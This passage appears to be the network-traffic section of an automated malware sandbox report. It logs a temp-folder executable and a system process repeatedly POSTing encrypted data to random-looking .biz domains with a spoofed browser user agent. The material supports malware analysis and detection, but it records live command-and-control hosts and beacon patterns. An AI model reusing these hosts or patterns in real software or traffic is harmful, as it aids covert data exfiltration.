                                                                                                                                                                                                                                                                                                                                                    36192.168.2.105001647.129.31.212807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.569245100 CET349OUTPOST /ijfjro HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.569339037 CET834OUTData Raw: 59 bc 13 80 11 42 b1 4e 36 03 00 00 4c 66 0b c8 eb 6e 8c 7e 41 3a df 72 25 8a 2a 3b de 4b d4 fe c5 64 1b 60 cb 18 03 18 14 72 d3 84 d6 e3 2b 6a eb 0c f8 64 1a ce ff 3b fb ed f4 f2 3e ab 9d 1e c5 47 22 40 8d ed c2 c3 ac 42 38 5f 3a c8 d9 7f eb 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: YBN6Lfn~A:r%*;Kd`r+jd;>G"@B8_:H|MGi'@Go6Y{uOS!v#7J.@if$UW@,|nV,~qp!%BVpr7f%|!>EA{jE :w\ Ln
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.204216957 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:41 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=b0469cb7cb7ab2df7f8f1682bd04e484|8.46.123.75|1732605281|1732605281|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    37192.168.2.105001718.208.156.248806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.443382025 CET352OUTPOST /dvsybtnikly HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.443382025 CET778OUTData Raw: ea 97 64 32 19 a2 c0 ea fe 02 00 00 2b 09 ed 17 e5 fb 47 6b 58 25 90 b4 fb ca cb 9d 68 e2 22 78 35 48 78 35 88 a5 88 a1 dd 7c 8c 9b 44 3d b2 3c 15 7b 3e ad 2f a7 db 17 9e d7 3f 27 ae 2c dc 87 c0 74 a4 55 8c cd be f9 4b 4a e4 5a 9d bc 5a b0 6f 43
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: d2+GkX%h"x5Hx5|D=<{>/?',tUKJZZoCo2LywvGhQ%cQI .@p|:cJg<eo QR(hhhWG`B o.i\SZK]9
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:41.603873968 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:41 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=7c0e29144aaed418d8272f539c63361f|8.46.123.75|1732605281|1732605281|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    38192.168.2.105001813.251.16.150807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.492192984 CET350OUTPOST /kqhlsuvr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.492223024 CET834OUTData Raw: 10 68 94 64 2a a5 7b 16 36 03 00 00 35 64 d7 6b dc 1a dd c9 9a 57 b1 d8 0a a3 7d e1 c3 19 0c 4d 60 ac 76 47 f0 64 80 88 8e 50 37 ba c9 ce c1 7e 63 3e 25 ac 2d ce fb 0e cf 60 f9 8d 5c ba df ef bf 1c 6e 6a b8 10 f8 e1 99 cb f4 cf 93 a1 97 1d 76 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: hd*{65dkW}M`vGdP7~c>%-`\njv2.B0\Yqe2f{#7kT1K\0-y!{U-](R?{[kGN!pnjR|{[79v"G/_k%fF
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.550344944 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:44 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=f2a57d05d174a4d05b4444a9c151bfa4|8.46.123.75|1732605284|1732605284|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    39192.168.2.1050019208.100.26.245806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.642379045 CET360OUTPOST /emkvqhipcuidqkmd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.642451048 CET778OUTData Raw: 4f 12 53 29 48 b6 fa b1 fe 02 00 00 a0 a5 b2 56 63 82 8f 51 76 a5 5c c7 ae 68 67 7c cb ca ce ca 23 6f d1 1d 4f 2d 3b f9 4d c1 da cd 95 b7 0c 45 e1 16 cf 62 54 cc 2e d5 9a 9d a8 82 d9 8f a0 1d bb 1d 9e 8d 33 4b 8f 9c 37 a2 71 66 78 97 f4 97 e7 e4
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: OS)HVcQv\hg|#oO-;MEbT.3K7qfxLLO-T%9~pT]2>Dz/TzylHb]nBDO~B*&oDy;C?oJXi@fkX;amYOv
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:43.813335896 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:43 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:43.825306892 CET356OUTPOST /mqrfuyvbhtbn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:43.828644991 CET778OUTData Raw: db dd 79 af 1b 1f eb ee fe 02 00 00 19 19 04 f0 a3 63 49 ac fa 27 2d 34 83 5f 85 08 b2 d4 83 88 27 45 42 95 7e 12 59 cc 3c 75 6b ea 0f 17 8b ba f5 d8 8b 53 88 b8 56 4a b1 56 68 b2 43 cc a6 ec e5 66 35 fa ae b3 f7 82 77 0a 6c ab 1b 28 d4 18 34 19
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ycI'-4_'EB~Y<ukSVJVhCf5wl(4[o[}2?$F%|u(^"Pqgnlqv15P>rD\%Y4EljPB4Jf=@OUJk/~gH1#[T&^ ,'"U
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.236932039 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:44 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    40192.168.2.105002044.221.84.105807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.864065886 CET347OUTPOST /wt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.864085913 CET834OUTData Raw: 2f f1 d9 45 84 6b 3b ee 36 03 00 00 05 38 db 50 ad 2d c0 10 d3 3b 2e b1 28 a9 be 3c ab d7 51 88 55 60 9e 56 26 9e 8d a7 62 67 22 f3 53 4d ec e6 f1 6b 62 3f d3 03 f4 8f 9c 36 7d 29 f1 fd cc 79 3c 3c ba 05 e4 da 9d 9e fd 54 c4 de 62 0c 14 9a 3d 7d
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /Ek;68P-;.(<QU`V&bg"SMkb?6})y<<Tb=}OE6?V>yoR$Ji8@/F`m=>dZv(cY#xkg_q+&D4uO(GC)"|>wyh}A@.J[a3O
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.005590916 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:45 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=44938078a5752b1db957be113c23cd4c|8.46.123.75|1732605285|1732605285|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    41192.168.2.105002113.251.16.150806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.934489965 CET347OUTPOST /fqwxf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.934520960 CET778OUTData Raw: e8 3a c2 e0 d9 a3 0f 9d fe 02 00 00 17 68 6a 44 fc bf f6 20 e7 a5 06 37 22 13 85 a1 63 ec 1c c2 61 d9 4a 6c c4 eb a1 34 dd e9 9f 32 54 50 9b 0a 26 cd 96 29 4a 34 7e 43 d0 77 52 99 a0 64 0e d8 20 8b 73 4e fd d0 f5 57 fd 25 b5 54 8e 70 49 96 8d 14
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :hjD 7"caJl42TP&)J4~CwRd sNW%TpI-^xH-.)WF#<d1Hk7{ Z5^ wmuxoBb"eS|3O=^`7&+i"lD
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.995250940 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:46 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=a6c872ebe435b3d52d824ede9e362257|8.46.123.75|1732605286|1732605286|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    42192.168.2.105002218.141.10.107807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.323909044 CET349OUTPOST /wxdopk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.323945999 CET834OUTData Raw: d5 6c b7 15 ed 82 9b 35 36 03 00 00 f3 76 7e 5d 0d a3 e5 e4 4a 9a d3 21 14 b0 f5 9b 04 df 20 38 ed a4 c1 8d 94 2d 5e 4d 00 2b 62 3a 04 8e 50 01 b8 a3 0d 37 78 e8 24 8d 26 51 bf 06 ac 1b 36 33 a5 3f 93 ab cc 91 4f 6f 84 25 96 fc cd 06 78 5c aa ed
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: l56v~]J! 8-^M+b:P7x$&Q63?Oo%x\(zSez!ILrOq{yr#b4aU8!Y!mE_;W|VQ@/Fy/2bk@G(uQf#>qyF[;b<|
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.447369099 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:48 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=1bc5ea05a1b0a80908c7392cb823cab9|8.46.123.75|1732605288|1732605288|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    43192.168.2.105002344.221.84.105806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.184844017 CET355OUTPOST /ifsivywgpp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.184886932 CET778OUTData Raw: 0e df d9 94 9b 51 7e f8 fe 02 00 00 03 b9 fd b5 df d7 fc 53 5b 0a 02 e4 45 81 96 84 b7 ce 57 71 d7 56 b3 6f f3 99 8b 8d 61 cf ba f4 46 39 fb a2 09 dd 01 26 f8 bf 30 bf 04 85 d9 78 aa a4 2a 6d c3 77 ce a3 e0 3d 5b 6a 1e 26 37 25 f2 9b 0e f4 d4 93
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Q~S[EWqVoaF9&0x*mw=[j&7%UEk8R*tjAS._%[2[-Kqx1=+oY8WcYf~w!{Nmbn^j3<5lYW,i![?/7]<pc7=dj
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.192790985 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:49 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=d3505cc4cd332189843fbd1f994fc445|8.46.123.75|1732605289|1732605289|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    44192.168.2.1050024172.234.222.138807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.762531996 CET344OUTPOST /kui HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
